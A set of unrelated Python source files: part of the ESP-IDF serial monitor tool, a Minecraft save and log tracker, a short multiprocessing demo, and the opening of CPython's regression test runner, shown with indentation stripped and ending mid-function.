if self._output_enabled:
self.console.write_bytes(self._last_line_part)
self.handle_possible_pc_address_in_line(self._last_line_part)
self.check_gdbstub_trigger(self._last_line_part)
# It is possible that the incomplete line cuts in half the PC
# address. A small buffer is kept and will be used the next time
# handle_possible_pc_address_in_line is invoked to avoid this problem.
# MATCH_PCADDR matches 10 character long addresses. Therefore, we
# keep the last 9 characters.
self._pc_address_buffer = self._last_line_part[-9:]
# GDB sequence can be cut in half also. GDB sequence is 7
# characters long, therefore, we save the last 6 characters.
self._gdb_buffer = self._last_line_part[-6:]
self._last_line_part = b""
# else: keeping _last_line_part and it will be processed the next time
# handle_serial_input is invoked
def handle_possible_pc_address_in_line(self, line):
line = self._pc_address_buffer + line
self._pc_address_buffer = b""
for m in re.finditer(MATCH_PCADDR, line):
self.lookup_pc_address(m.group())
def handle_menu_key(self, c):
if c == self.exit_key or c == self.menu_key: # send verbatim
self.serial.write(codecs.encode(c))
elif c in [ CTRL_H, 'h', 'H', '?' ]:
red_print(self.get_help_text())
elif c == CTRL_R: # Reset device via RTS
self.serial.setRTS(True)
time.sleep(0.2)
self.serial.setRTS(False)
self.output_enable(True)
elif c == CTRL_F: # Recompile & upload
self.run_make("flash")
elif c == CTRL_A: # Recompile & upload app only
self.run_make("app-flash")
elif c == CTRL_Y: # Toggle output display
self.output_toggle()
elif c == CTRL_P:
yellow_print("Pause app (enter bootloader mode), press Ctrl-T Ctrl-R to restart")
# fast-trigger the pause without pressing the menu key
self.serial.setDTR(False) # IO0=HIGH
self.serial.setRTS(True) # EN=LOW, chip in reset
time.sleep(1.3) # timeouts taken from esptool.py, includes esp32r0 workaround. defaults: 0.1
self.serial.setDTR(True) # IO0=LOW
self.serial.setRTS(False) # EN=HIGH, chip out of reset
time.sleep(0.45) # timeouts taken from esptool.py, includes esp32r0 workaround. defaults: 0.05
self.serial.setDTR(False) # IO0=HIGH, done
else:
red_print('--- unknown menu character {} --'.format(key_description(c)))
def get_help_text(self):
return """
--- idf_monitor ({version}) - ESP-IDF monitor tool
--- based on miniterm from pySerial
---
--- {exit:8} Exit program
--- {menu:8} Menu escape key, followed by:
--- Menu keys:
--- {menu:7} Send the menu character itself to remote
--- {exit:7} Send the exit character itself to remote
--- {reset:7} Reset target board via RTS line
--- {make:7} Run 'make flash' to build & flash
--- {appmake:7} Run 'make app-flash' to build & flash app
--- {output:7} Toggle output display
--- {pause:7} Reset target into bootloader to pause app via RTS line
""".format(version=__version__,
exit=key_description(self.exit_key),
menu=key_description(self.menu_key),
reset=key_description(CTRL_R),
make=key_description(CTRL_F),
appmake=key_description(CTRL_A),
output=key_description(CTRL_Y),
pause=key_description(CTRL_P),
)
def __enter__(self):
""" Use 'with self' to temporarily disable monitoring behaviour """
self.serial_reader.stop()
self.console_reader.stop()
def __exit__(self, *args, **kwargs):
""" Use 'with self' to temporarily disable monitoring behaviour """
self.console_reader.start()
self.serial_reader.start()
def prompt_next_action(self, reason):
self.console.setup() # set up console to trap input characters
try:
red_print("""
--- {}
--- Press {} to exit monitor.
--- Press {} to run 'make flash'.
--- Press {} to run 'make app-flash'.
--- Press any other key to resume monitor (resets target).""".format(reason,
key_description(self.exit_key),
key_description(CTRL_F),
key_description(CTRL_A)))
k = CTRL_T # ignore CTRL-T here, so people can muscle-memory Ctrl-T Ctrl-F, etc.
while k == CTRL_T:
k = self.console.getkey()
finally:
self.console.cleanup()
if k == self.exit_key:
self.event_queue.put((TAG_KEY, k))
elif k in [ CTRL_F, CTRL_A ]:
self.event_queue.put((TAG_KEY, self.menu_key))
self.event_queue.put((TAG_KEY, k))
def run_make(self, target):
with self:
yellow_print("Running make %s..." % target)
p = subprocess.Popen([self.make,
target ])
try:
p.wait()
except KeyboardInterrupt:
p.wait()
if p.returncode != 0:
self.prompt_next_action("Build failed")
else:
self.output_enable(True)
def lookup_pc_address(self, pc_addr):
translation = subprocess.check_output(
["%saddr2line" % self.toolchain_prefix,
"-pfiaC", "-e", self.elf_file, pc_addr],
cwd=".")
if not "?? ??:0" in translation:
yellow_print(translation)
def check_gdbstub_trigger(self, line):
line = self._gdb_buffer + line
self._gdb_buffer = b""
m = re.search(b"\\$(T..)#(..)", line) # look for a gdb "reason" for a break
if m is not None:
try:
chsum = sum(ord(p) for p in m.group(1)) & 0xFF
calc_chsum = int(m.group(2), 16)
except ValueError:
return # payload wasn't valid hex digits
if chsum == calc_chsum:
self.run_gdb()
else:
red_print("Malformed gdb message... calculated checksum %02x received %02x" % (chsum, calc_chsum))
def run_gdb(self):
with self: # disable console control
sys.stderr.write(ANSI_NORMAL)
try:
process = subprocess.Popen(["%sgdb" % self.toolchain_prefix,
"-ex", "set serial baud %d" % self.serial.baudrate,
"-ex", "target remote %s" % self.serial.port,
"-ex", "interrupt", # monitor has already parsed the first 'reason' command, need a second
self.elf_file], cwd=".")
process.wait()
except KeyboardInterrupt:
pass # happens on Windows, maybe other OSes
finally:
try:
# on Linux, maybe other OSes, gdb sometimes seems to be alive even after wait() returns...
process.terminate()
except:
pass
try:
# also on Linux, maybe other OSes, gdb sometimes exits uncleanly and breaks the tty mode
subprocess.call(["stty", "sane"])
except:
pass # don't care if there's no stty, we tried...
self.prompt_next_action("gdb exited")
def output_enable(self, enable):
self._output_enabled = enable
def output_toggle(self):
self._output_enabled = not self._output_enabled
yellow_print("\nToggle output display: {}, Type Ctrl-T Ctrl-Y to show/disable output again.".format(self._output_enabled))
def main():
parser = argparse.ArgumentParser("idf_monitor - a serial output monitor for esp-idf")
parser.add_argument(
'--port', '-p',
help='Serial port device',
default=os.environ.get('ESPTOOL_PORT', '/dev/ttyUSB0')
)
parser.add_argument(
'--baud', '-b',
help='Serial port baud rate',
type=int,
default=os.environ.get('MONITOR_BAUD', 115200))
parser.add_argument(
'--make', '-m',
help='Command to run make',
type=str, default='make')
parser.add_argument(
'--toolchain-prefix',
help="Triplet prefix to add before cross-toolchain names",
default=DEFAULT_TOOLCHAIN_PREFIX)
parser.add_argument(
"--eol",
choices=['CR', 'LF', 'CRLF'],
type=lambda c: c.upper(),
help="End of line to use when sending to the serial port",
default='CR')
parser.add_argument(
'elf_file', help='ELF file of application',
type=argparse.FileType('rb'))
parser.add_argument(
'--print_filter',
help="Filtering string",
default=DEFAULT_PRINT_FILTER)
args = parser.parse_args()
if args.port.startswith("/dev/tty."):
args.port = args.port.replace("/dev/tty.", "/dev/cu.")
yellow_print("--- WARNING: Serial ports accessed as /dev/tty.* will hang gdb if launched.")
yellow_print("--- Using %s instead..." % args.port)
serial_instance = serial.serial_for_url(args.port, args.baud,
do_not_open=True)
serial_instance.dtr = False
serial_instance.rts = False
args.elf_file.close() # don't need this as a file
# remove the parallel jobserver arguments from MAKEFLAGS, as any
# parent make is only running 1 job (monitor), so we can re-spawn
# all of the child makes we need (the -j argument remains part of
# MAKEFLAGS)
try:
makeflags = os.environ["MAKEFLAGS"]
makeflags = re.sub(r"--jobserver[^ =]*=[0-9,]+ ?", "", makeflags)
os.environ["MAKEFLAGS"] = makeflags
except KeyError:
pass # not running a make jobserver
monitor = Monitor(serial_instance, args.elf_file.name, args.print_filter, args.make, args.toolchain_prefix, args.eol)
yellow_print('--- idf_monitor on {p.name} {p.baudrate} ---'.format(
p=serial_instance))
yellow_print('--- Quit: {} | Menu: {} | Help: {} followed by {} ---'.format(
key_description(monitor.exit_key),
key_description(monitor.menu_key),
key_description(monitor.menu_key),
key_description(CTRL_H)))
if args.print_filter != DEFAULT_PRINT_FILTER:
yellow_print('--- Print filter: {} ---'.format(args.print_filter))
monitor.main_loop()
if os.name == 'nt':
# Windows console stuff
STD_OUTPUT_HANDLE = -11
STD_ERROR_HANDLE = -12
# wincon.h values
FOREGROUND_INTENSITY = 8
FOREGROUND_GREY = 7
# matches the ANSI color change sequences that IDF sends
RE_ANSI_COLOR = re.compile(b'\033\\[([01]);3([0-7])m')
# list mapping the 8 ANSI colors (the indexes) to Windows Console colors
ANSI_TO_WINDOWS_COLOR = [ 0, 4, 2, 6, 1, 5, 3, 7 ]
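# e.g. index 1 (ANSI red, escape code 31) maps to Windows attribute 4 (FOREGROUND_RED),
# and index 3 (ANSI yellow, 33) maps to 6 (red | green)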
GetStdHandle = ctypes.windll.kernel32.GetStdHandle
SetConsoleTextAttribute = ctypes.windll.kernel32.SetConsoleTextAttribute
class ANSIColorConverter(object):
"""Class to wrap a file-like output stream, intercept ANSI color codes,
and convert them into calls to Windows SetConsoleTextAttribute.
Doesn't support all ANSI terminal code escape sequences, only the sequences IDF uses.
Ironically, in Windows this console output is normally wrapped by winpty which will then detect the console text
color changes and convert these back to ANSI color codes for MSYS' terminal to display. However this is the
least-bad working solution, as winpty doesn't support any "passthrough" mode for raw output.
"""
def __init__(self, output):
self.output = output
self.handle = GetStdHandle(STD_ERROR_HANDLE if self.output == sys.stderr else STD_OUTPUT_HANDLE)
self.matched = b''
def _output_write(self, data):
try:
self.output.write(data)
except IOError:
# Windows 10 bug since the Fall Creators Update, sometimes writing to console randomly throws
# an exception (however, the character is still written to the screen)
# Ref https://github.com/espressif/esp-idf/issues/1136
pass
def write(self, data):
for b in data:
l = len(self.matched)
if b == '\033': # ESC
self.matched = b
elif (l == 1 and b == '[') or (1 < l < 7):
self.matched += b
if self.matched == ANSI_NORMAL: # reset console
SetConsoleTextAttribute(self.handle, FOREGROUND_GREY)
self.matched = b''
elif len(self.matched) == 7: # could be an ANSI sequence
m = re.match(RE_ANSI_COLOR, self.matched)
if m is not None:
color = ANSI_TO_WINDOWS_COLOR[int(m.group(2))]
if m.group(1) == b'1':
color |= FOREGROUND_INTENSITY
SetConsoleTextAttribute(self.handle, color)
else:
self._output_write(self.matched) # not an ANSI color code, display verbatim
self.matched = b''
else:
self._output_write(b)
self.matched = b''
def flush(self):
self.output.flush()
if __name__ == "__main__":
main()
|
Trackers.py
|
import threading
import os
import time
import json
from python_nbt import nbt
class SavesTracker:
def __init__(self, path):
self.path = path
self.running = True
self.mtime = 0
self.latestWorld = None
self.savesLen = 0
self.worldList = []
self.newWorldCalls = []
self.updateWorldList()
threading.Thread(target=self.loop).start()
def stop(self):
self.running = False
def addNewWorldCall(self, func, args=""):
self.newWorldCalls.append((func, args))
def newWorldEvent(self):
for i in self.newWorldCalls:
i[0](*i[1])
def getIGT(self, world=None):
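# Minecraft stores play time in ticks (20 per second), hence the /20 below; the
# fallbacks cover the older "stat.playOneMinute" and newer "minecraft:play_time" keys.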
try:
if world is None:
world = self.latestWorld
if world is None:
return 0
else:
statsPath = os.path.join(self.path, world, "stats")
statsFiles = os.listdir(statsPath)
if len(statsFiles) > 0:
with open(os.path.join(statsPath, statsFiles[0]), "r") as statsFile:
statsJson = json.load(statsFile)
try:
return statsJson["stats"]["minecraft:custom"]["minecraft:play_one_minute"]/20
except:
try:
return statsJson["stat.playOneMinute"]/20
except:
return statsJson["stats"]["minecraft:custom"]["minecraft:play_time"]/20
else:
return 0
except:
return 0
def getAltIGT(self, world=None):
try:
if world is None:
world = self.latestWorld
if world is None:
return 0
else:
levelDatPath = os.path.join(self.path, world, "level.dat")
levelDatNBT = nbt.read_from_nbt_file(levelDatPath)["Data"]
return levelDatNBT["Time"].value/20
except:
return 0
def getKills(self, mobName, world=None):
try:
if world is None:
world = self.latestWorld
if world is None:
return 0
else:
statsPath = os.path.join(self.path, world, "stats")
statsFiles = os.listdir(statsPath)
if len(statsFiles) > 0:
with open(os.path.join(statsPath, statsFiles[0]), "r") as statsFile:
statsJson = json.load(statsFile)
try:
return statsJson["stats"]["minecraft:killed"][f"minecraft:{mobName.lower()}"]
except:
return statsJson[f"stat.killEntity.{mobName[0].upper()+mobName[1:].lower()}"]
else:
return 0
except:
return 0
def updateWorldList(self):
oldList = self.worldList[:]
self.worldList = []
newLatestWorld = None
maxTime = 0
if os.path.isdir(self.path):
for worldName in os.listdir(self.path):
if os.path.isfile(os.path.join(self.path, worldName, "level.dat")):
self.worldList.append(worldName)
wtime = os.path.getctime(
    os.path.join(self.path, worldName))
if wtime > maxTime:
newLatestWorld = worldName
maxTime = wtime
if worldName not in oldList:
self.newWorldEvent()
else:
threading.Thread(target=self.waitForWorld,
args=(worldName,)).start()
self.latestWorld = newLatestWorld
def waitForWorld(self, worldName):
while self.running:
time.sleep(0.5)
if not os.path.isdir(os.path.join(self.path, worldName)):
return
elif os.path.isfile(os.path.join(self.path, worldName, "level.dat")):
self.updateWorldList()
return
def loop(self):
while self.running:
time.sleep(0.1)
if os.path.isdir(self.path):
newlen = len(os.listdir(self.path))
newmtime = os.path.getmtime(self.path)
if self.mtime != newmtime or self.savesLen != newlen:
self.savesLen = newlen
self.mtime = newmtime
self.updateWorldList()
class LogsTracker:
def __init__(self, path):
self.path = path
self.logPath = os.path.join(self.path, "latest.log")
self.running = True
self.hasThread = False
def cancel(self):
self.running = False
stop = cancel
def refresh(self):
self.start = time.time()
def listenUntilWorldStart(self, timeout, responseCall, args=""):
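# Watches latest.log for a "logged in with entity id" line (written when a player
# joins a world) and calls responseCall; if a listener thread is already running,
# refresh() simply restarts its timeout window.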
if not self.hasThread:
threading.Thread(target=self._listenThread,
args=(timeout, responseCall, args)).start()
else:
self.refresh()
def _listenThread(self, timeout, responseCall, args):
self.hasThread = True
try:
if os.path.isfile(self.logPath):
self.start = time.time()
self.running = True
lineLen = len(self.getLines())
mtime = os.path.getmtime(self.logPath)
while self.running and time.time() - self.start < timeout:
time.sleep(0.1)
newmtime = os.path.getmtime(self.logPath)
if mtime != newmtime:
mtime = newmtime
lines = self.getLines()
newLen = len(lines)
if newLen > lineLen:
for line in lines[lineLen: newLen]:
if "logged in with entity id" in line:
responseCall(*args)
lineLen = newLen
else:
print("latest.log not found")
except ValueError as err:
print(err)
self.hasThread = False
self.running = False
def getLines(self):
with open(self.logPath) as logFile:
lines = [i.rstrip() for i in logFile.readlines()]
return lines
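# --- Minimal usage sketch (not part of the original module) ---
# Assumes a hypothetical Minecraft instance directory; the paths and the printed
# message are illustrative only.
if __name__ == "__main__":
    saves = SavesTracker(os.path.expanduser("~/.minecraft/saves"))
    logs = LogsTracker(os.path.expanduser("~/.minecraft/logs"))
    # Print the in-game time of the newest world whenever a new world shows up.
    saves.addNewWorldCall(lambda: print("new world, IGT:", saves.getIGT()))
    try:
        time.sleep(5)  # let the background tracker thread run briefly
    finally:
        saves.stop()
        logs.stop()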
|
example2.py
|
#!/usr/bin/env python
import multiprocessing
import time
def worker():
print('new worker')
time.sleep(0.5)
print('end of worker')
t0 = multiprocessing.Process(target=worker)
t1 = multiprocessing.Process()
t0.daemon = t1.daemon = True
t1.run = worker
print('before')
t0.start()
time.sleep(0.1)
t1.start()
print('after')
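# Note: both processes are daemonic, so they are terminated when the main
# process exits; depending on timing, "end of worker" may never be printed.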
|
regrtest.py
|
#! /usr/bin/python3.3
"""
Usage:
python -m test [options] [test_name1 [test_name2 ...]]
python path/to/Lib/test/regrtest.py [options] [test_name1 [test_name2 ...]]
If no arguments or options are provided, finds all files matching
the pattern "test_*" in the Lib/test subdirectory and runs
them in alphabetical order (but see -M and -u, below, for exceptions).
For more rigorous testing, it is useful to use the following
command line:
python -E -Wd -m test [options] [test_name1 ...]
Options:
-h/--help -- print this text and exit
--timeout TIMEOUT
-- dump the traceback and exit if a test takes more
than TIMEOUT seconds; disabled if TIMEOUT is negative
or equal to zero
--wait -- wait for user input, e.g., allow a debugger to be attached
Verbosity
-v/--verbose -- run tests in verbose mode with output to stdout
-w/--verbose2 -- re-run failed tests in verbose mode
-W/--verbose3 -- display test output on failure
-d/--debug -- print traceback for failed tests
-q/--quiet -- no output unless one or more tests fail
-o/--slow -- print the slowest 10 tests
--header -- print header with interpreter info
Selecting tests
-r/--randomize -- randomize test execution order (see below)
--randseed -- pass a random seed to reproduce a previous random run
-f/--fromfile -- read names of tests to run from a file (see below)
-x/--exclude -- arguments are tests to *exclude*
-s/--single -- single step through a set of tests (see below)
-m/--match PAT -- match test cases and methods with glob pattern PAT
-G/--failfast -- fail as soon as a test fails (only with -v or -W)
-u/--use RES1,RES2,...
-- specify which special resource intensive tests to run
-M/--memlimit LIMIT
-- run very large memory-consuming tests
--testdir DIR
-- execute test files in the specified directory (instead
of the Python stdlib test suite)
Special runs
-l/--findleaks -- if GC is available detect tests that leak memory
-L/--runleaks -- run the leaks(1) command just before exit
-R/--huntrleaks RUNCOUNTS
-- search for reference leaks (needs debug build, v. slow)
-j/--multiprocess PROCESSES
-- run PROCESSES processes at once
-T/--coverage -- turn on code coverage tracing using the trace module
-D/--coverdir DIRECTORY
-- Directory where coverage files are put
-N/--nocoverdir -- Put coverage files alongside modules
-t/--threshold THRESHOLD
-- call gc.set_threshold(THRESHOLD)
-n/--nowindows -- suppress error message boxes on Windows
-F/--forever -- run the specified tests in a loop, until an error happens
Additional Option Details:
-r randomizes test execution order. You can use --randseed=int to provide an
int seed value for the randomizer; this is useful for reproducing troublesome
test orders.
-s On the first invocation of regrtest using -s, the first test file found
or the first test file given on the command line is run, and the name of
the next test is recorded in a file named pynexttest. If run from the
Python build directory, pynexttest is located in the 'build' subdirectory,
otherwise it is located in tempfile.gettempdir(). On subsequent runs,
the test in pynexttest is run, and the next test is written to pynexttest.
When the last test has been run, pynexttest is deleted. In this way it
is possible to single step through the test files. This is useful when
doing memory analysis on the Python interpreter, a process that tends to
consume too many resources to run the full regression test non-stop.
-S is used to continue running tests after an aborted run. It will
maintain the order of a standard run (i.e., this assumes -r is not used).
This is useful after the tests have prematurely stopped for some external
reason and you want to start running from where you left off rather
than starting from the beginning.
-f reads the names of tests from the file given as f's argument, one
or more test names per line. Whitespace is ignored. Blank lines and
lines beginning with '#' are ignored. This is especially useful for
whittling down failures involving interactions among tests.
-L causes the leaks(1) command to be run just before exit if it exists.
leaks(1) is available on Mac OS X and presumably on some other
FreeBSD-derived systems.
-R runs each test several times and examines sys.gettotalrefcount() to
see if the test appears to be leaking references. The argument should
be of the form stab:run:fname where 'stab' is the number of times the
test is run to let gettotalrefcount settle down, 'run' is the number
of times further it is run and 'fname' is the name of the file the
reports are written to. These parameters all have defaults (5, 4 and
"reflog.txt" respectively), and the minimal invocation is '-R :'.
-M runs tests that require an exorbitant amount of memory. These tests
typically try to ascertain that containers keep working when containing more than
2 billion objects, which only works on 64-bit systems. There are also some
tests that try to exhaust the address space of the process, which only makes
sense on 32-bit systems with at least 2Gb of memory. The passed-in memlimit,
which is a string in the form of '2.5Gb', determines how much memory the
tests will limit themselves to (but they may go slightly over.) The number
shouldn't be more memory than the machine has (including swap memory). You
should also keep in mind that swap memory is generally much, much slower
than RAM, and setting memlimit to all available RAM or higher will heavily
tax the machine. On the other hand, it is no use running these tests with a
limit of less than 2.5Gb, and many require more than 20Gb. Tests that expect
to use more than memlimit memory will be skipped. The big-memory tests
generally run very, very long.
-u is used to specify which special resource intensive tests to run,
such as those requiring large file support or network connectivity.
The argument is a comma-separated list of words indicating the
resources to test. Currently only the following are defined:
all - Enable all special resources.
none - Disable all special resources (this is the default).
audio - Tests that use the audio device. (There are known
cases of broken audio drivers that can crash Python or
even the Linux kernel.)
curses - Tests that use curses and will modify the terminal's
state and output modes.
largefile - It is okay to run some test that may create huge
files. These tests can take a long time and may
consume >2GB of disk space temporarily.
network - It is okay to run tests that use external network
resource, e.g. testing SSL support for sockets.
decimal - Test the decimal module against a large suite that
verifies compliance with standards.
cpu - Used for certain CPU-heavy tests.
subprocess - Run all tests for the subprocess module.
urlfetch - It is okay to download files required on testing.
gui - Run tests that require a running GUI.
To enable all resources except one, use '-uall,-<resource>'. For
example, to run all the tests except for the gui tests, give the
option '-uall,-gui'.
"""
# We import importlib *ASAP* in order to test #15386
import importlib
import builtins
import faulthandler
import getopt
import io
import json
import logging
import os
import platform
import random
import re
import shutil
import signal
import sys
import sysconfig
import tempfile
import time
import traceback
import unittest
import warnings
from inspect import isabstract
try:
import threading
except ImportError:
threading = None
try:
import multiprocessing.process
except ImportError:
multiprocessing = None
# Sometimes __path__ and __file__ are not absolute (e.g. while running from
# Lib/) and, if we change the CWD to run the tests in a temporary dir, some
# imports might fail. This affects only the modules imported before os.chdir().
# These modules are searched first in sys.path[0] (so '' -- the CWD) and if
# they are found in the CWD their __file__ and __path__ will be relative (this
# happens before the chdir). All the modules imported after the chdir, are
# not found in the CWD, and since the other paths in sys.path[1:] are absolute
# (site.py absolutizes them), the __file__ and __path__ will be absolute too.
# Therefore it is necessary to manually absolutize the __file__ and __path__ of
# the packages to prevent later imports from failing when the CWD is different.
for module in sys.modules.values():
if hasattr(module, '__path__'):
module.__path__ = [os.path.abspath(path) for path in module.__path__]
if hasattr(module, '__file__'):
module.__file__ = os.path.abspath(module.__file__)
# MacOSX (a.k.a. Darwin) has a default stack size that is too small
# for deeply recursive regular expressions. We see this as crashes in
# the Python test suite when running test_re.py and test_sre.py. The
# fix is to set the stack limit to 2048 KiB (2 MiB).
# This approach may also be useful for other Unixy platforms that
# suffer from small default stack limits.
if sys.platform == 'darwin':
try:
import resource
except ImportError:
pass
else:
soft, hard = resource.getrlimit(resource.RLIMIT_STACK)
newsoft = min(hard, max(soft, 1024*2048))
resource.setrlimit(resource.RLIMIT_STACK, (newsoft, hard))
# Test result constants.
PASSED = 1
FAILED = 0
ENV_CHANGED = -1
SKIPPED = -2
RESOURCE_DENIED = -3
INTERRUPTED = -4
CHILD_ERROR = -5 # error in a child process
from test import support
RESOURCE_NAMES = ('audio', 'curses', 'largefile', 'network',
'decimal', 'cpu', 'subprocess', 'urlfetch', 'gui')
TEMPDIR = os.path.abspath(tempfile.gettempdir())
def usage(msg):
print(msg, file=sys.stderr)
print("Use --help for usage", file=sys.stderr)
sys.exit(2)
def main(tests=None, testdir=None, verbose=0, quiet=False,
exclude=False, single=0, randomize=False, fromfile=None,
findleaks=False, use_resources=None, trace=False, coverdir='coverage',
runleaks=False, huntrleaks=False, verbose2=False, print_slow=False,
random_seed=None, use_mp=None, verbose3=False, forever=False,
header=False, failfast=False, match_tests=None):
"""Execute a test suite.
This also parses command-line options and modifies its behavior
accordingly.
tests -- a list of strings containing test names (optional)
testdir -- the directory in which to look for tests (optional)
Users other than the Python test suite will certainly want to
specify testdir; if it's omitted, the directory containing the
Python test suite is searched for.
If the tests argument is omitted, the tests listed on the
command-line will be used. If that's empty, too, then all *.py
files beginning with test_ will be used.
The other default arguments (verbose, quiet, exclude,
single, randomize, findleaks, use_resources, trace, coverdir,
print_slow, and random_seed) allow programmers calling main()
directly to set the values that would normally be set by flags
on the command line.
"""
# Display the Python traceback on fatal errors (e.g. segfault)
faulthandler.enable(all_threads=True)
# Display the Python traceback on SIGALRM or SIGUSR1 signal
signals = []
if hasattr(signal, 'SIGALRM'):
signals.append(signal.SIGALRM)
if hasattr(signal, 'SIGUSR1'):
signals.append(signal.SIGUSR1)
for signum in signals:
faulthandler.register(signum, chain=True)
replace_stdout()
support.record_original_stdout(sys.stdout)
try:
opts, args = getopt.getopt(sys.argv[1:], 'hvqxsoS:rf:lu:t:TD:NLR:FdwWM:nj:Gm:',
['help', 'verbose', 'verbose2', 'verbose3', 'quiet',
'exclude', 'single', 'slow', 'randomize', 'fromfile=', 'findleaks',
'use=', 'threshold=', 'coverdir=', 'nocoverdir',
'runleaks', 'huntrleaks=', 'memlimit=', 'randseed=',
'multiprocess=', 'coverage', 'slaveargs=', 'forever', 'debug',
'start=', 'nowindows', 'header', 'testdir=', 'timeout=', 'wait',
'failfast', 'match=', 'next='])
except getopt.error as msg:
usage(msg)
# Defaults
if random_seed is None:
random_seed = random.randrange(10000000)
if use_resources is None:
use_resources = []
debug = False
start = None
timeout = None
for o, a in opts:
if o in ('-h', '--help'):
print(__doc__)
return
elif o in ('-v', '--verbose'):
verbose += 1
elif o in ('-w', '--verbose2'):
verbose2 = True
elif o in ('-d', '--debug'):
debug = True
elif o in ('-W', '--verbose3'):
verbose3 = True
elif o in ('-G', '--failfast'):
failfast = True
elif o in ('-q', '--quiet'):
quiet = True
verbose = 0
elif o in ('-x', '--exclude'):
exclude = True
elif o in ('-S', '--start'):
start = a
elif o in ('-s', '--single'):
single = 1
elif o == '--next':
single = int(a)
elif o in ('-o', '--slow'):
print_slow = True
elif o in ('-r', '--randomize'):
randomize = True
elif o == '--randseed':
random_seed = int(a)
elif o in ('-f', '--fromfile'):
fromfile = a
elif o in ('-m', '--match'):
match_tests = a
elif o in ('-l', '--findleaks'):
findleaks = True
elif o in ('-L', '--runleaks'):
runleaks = True
elif o in ('-t', '--threshold'):
import gc
gc.set_threshold(int(a))
elif o in ('-T', '--coverage'):
trace = True
elif o in ('-D', '--coverdir'):
# CWD is replaced with a temporary dir before calling main(), so we
# need to join it with the saved CWD so it goes where the user expects.
coverdir = os.path.join(support.SAVEDCWD, a)
elif o in ('-N', '--nocoverdir'):
coverdir = None
elif o in ('-R', '--huntrleaks'):
huntrleaks = a.split(':')
if len(huntrleaks) not in (2, 3):
print(a, huntrleaks)
usage('-R takes 2 or 3 colon-separated arguments')
if not huntrleaks[0]:
huntrleaks[0] = 5
else:
huntrleaks[0] = int(huntrleaks[0])
if not huntrleaks[1]:
huntrleaks[1] = 4
else:
huntrleaks[1] = int(huntrleaks[1])
if len(huntrleaks) == 2 or not huntrleaks[2]:
huntrleaks[2:] = ["reflog.txt"]
# Avoid false positives due to various caches
# filling slowly with random data:
warm_caches()
elif o in ('-M', '--memlimit'):
support.set_memlimit(a)
elif o in ('-u', '--use'):
u = [x.lower() for x in a.split(',')]
for r in u:
if r == 'all':
use_resources[:] = RESOURCE_NAMES
continue
if r == 'none':
del use_resources[:]
continue
remove = False
if r[0] == '-':
remove = True
r = r[1:]
if r not in RESOURCE_NAMES:
usage('Invalid -u/--use option: ' + a)
if remove:
if r in use_resources:
use_resources.remove(r)
elif r not in use_resources:
use_resources.append(r)
elif o in ('-n', '--nowindows'):
import msvcrt
msvcrt.SetErrorMode(msvcrt.SEM_FAILCRITICALERRORS|
msvcrt.SEM_NOALIGNMENTFAULTEXCEPT|
msvcrt.SEM_NOGPFAULTERRORBOX|
msvcrt.SEM_NOOPENFILEERRORBOX)
try:
msvcrt.CrtSetReportMode
except AttributeError:
# release build
pass
else:
for m in [msvcrt.CRT_WARN, msvcrt.CRT_ERROR, msvcrt.CRT_ASSERT]:
msvcrt.CrtSetReportMode(m, msvcrt.CRTDBG_MODE_FILE)
msvcrt.CrtSetReportFile(m, msvcrt.CRTDBG_FILE_STDERR)
elif o in ('-F', '--forever'):
forever = True
elif o in ('-j', '--multiprocess'):
use_mp = int(a)
if use_mp <= 0:
try:
import multiprocessing
# Use all cores + extras for tests that like to sleep
use_mp = 2 + multiprocessing.cpu_count()
except (ImportError, NotImplementedError):
use_mp = 3
if use_mp == 1:
use_mp = None
elif o == '--header':
header = True
elif o == '--slaveargs':
args, kwargs = json.loads(a)
try:
result = runtest(*args, **kwargs)
except KeyboardInterrupt:
result = INTERRUPTED, ''
except BaseException as e:
traceback.print_exc()
result = CHILD_ERROR, str(e)
sys.stdout.flush()
print() # Force a newline (just in case)
print(json.dumps(result))
sys.exit(0)
elif o == '--testdir':
# CWD is replaced with a temporary dir before calling main(), so we
# join it with the saved CWD so it ends up where the user expects.
testdir = os.path.join(support.SAVEDCWD, a)
elif o == '--timeout':
if hasattr(faulthandler, 'dump_tracebacks_later'):
timeout = float(a)
if timeout <= 0:
timeout = None
else:
print("Warning: The timeout option requires "
"faulthandler.dump_tracebacks_later")
timeout = None
elif o == '--wait':
input("Press any key to continue...")
else:
print(("No handler for option {}. Please report this as a bug "
"at http://bugs.python.org.").format(o), file=sys.stderr)
sys.exit(1)
if single and fromfile:
usage("-s and -f don't go together!")
if use_mp and trace:
usage("-T and -j don't go together!")
if use_mp and findleaks:
usage("-l and -j don't go together!")
if use_mp and support.max_memuse:
usage("-M and -j don't go together!")
if failfast and not (verbose or verbose3):
usage("-G/--failfast needs either -v or -W")
good = []
bad = []
skipped = []
resource_denieds = []
environment_changed = []
interrupted = False
if findleaks:
try:
import gc
except ImportError:
print('No GC available, disabling findleaks.')
findleaks = False
else:
# Uncomment the line below to report garbage that is not
# freeable by reference counting alone. By default only
# garbage that is not collectable by the GC is reported.
#gc.set_debug(gc.DEBUG_SAVEALL)
found_garbage = []
if single:
filename = os.path.join(TEMPDIR, 'pynexttest')
try:
fp = open(filename, 'r')
next_test = fp.read().strip()
tests = [next_test]
fp.close()
except IOError:
pass
if fromfile:
tests = []
fp = open(os.path.join(support.SAVEDCWD, fromfile))
count_pat = re.compile(r'\[\s*\d+/\s*\d+\]')
for line in fp:
line = count_pat.sub('', line)
guts = line.split() # assuming no test has whitespace in its name
if guts and not guts[0].startswith('#'):
tests.extend(guts)
fp.close()
# Strip .py extensions.
removepy(args)
removepy(tests)
stdtests = STDTESTS[:]
nottests = NOTTESTS.copy()
if exclude:
for arg in args:
if arg in stdtests:
stdtests.remove(arg)
nottests.add(arg)
args = []
# For a partial run, we do not need to clutter the output.
if verbose or header or not (quiet or single != 1 or tests or args):
# Print basic platform information
print("==", platform.python_implementation(), *sys.version.split())
print("== ", platform.platform(aliased=True),
"%s-endian" % sys.byteorder)
print("== ", os.getcwd())
print("Testing with flags:", sys.flags)
# if testdir is set, then we are not running the python tests suite, so
# don't add default tests to be executed or skipped (pass empty values)
if testdir:
alltests = findtests(testdir, list(), set())
else:
alltests = findtests(testdir, stdtests, nottests)
selected = tests or args or alltests
if single:
first_selected = selected[0]
index_selected = alltests.index(first_selected)
if index_selected + single > len(alltests):
single = len(alltests) - index_selected
selected = alltests[index_selected:index_selected+single]
try:
next_single_test = alltests[index_selected+single]
except IndexError:
next_single_test = None
# Remove all the selected tests that precede start if it's set.
if start:
try:
del selected[:selected.index(start)]
except ValueError:
print("Couldn't find starting test (%s), using all tests" % start)
if randomize:
random.seed(random_seed)
